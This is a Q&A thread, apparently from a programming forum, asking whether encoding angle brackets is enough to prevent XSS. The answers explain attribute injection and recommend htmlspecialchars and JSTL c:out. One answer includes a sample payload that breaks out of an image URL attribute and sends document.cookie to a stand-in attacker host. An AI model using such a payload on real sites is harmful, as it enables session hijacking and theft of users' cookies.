Is replacing : < and> with < and> enough to prevent XSS injection?

Question

I want to know if entiting the two marks < and > is enough to prevent XSS injections?

And if not, why? And what\'s the best solution?

Answer 1

It depends very much on context.

Check out this example, from a typical forum site...

You may hotlink your avatar image. Enter the full URL.

Malicious user enters in input field

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie) 

There is no encoding there of less than and greater than, but still a big security hole.

With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.

Answer 2

You should also take doublequotes ", singlequotes ' and ampersands & into account. If you do that all during displaying/generating the output, then yes, it's enough.

You should only ensure that you do this for any user-controlled input, such as request parameters, request URL, request headers and user-controlled input which is been stored in a datastore.

In PHP you can do that with htmlspecialchars() and in JSP cou can do that with JSTL <c:out>.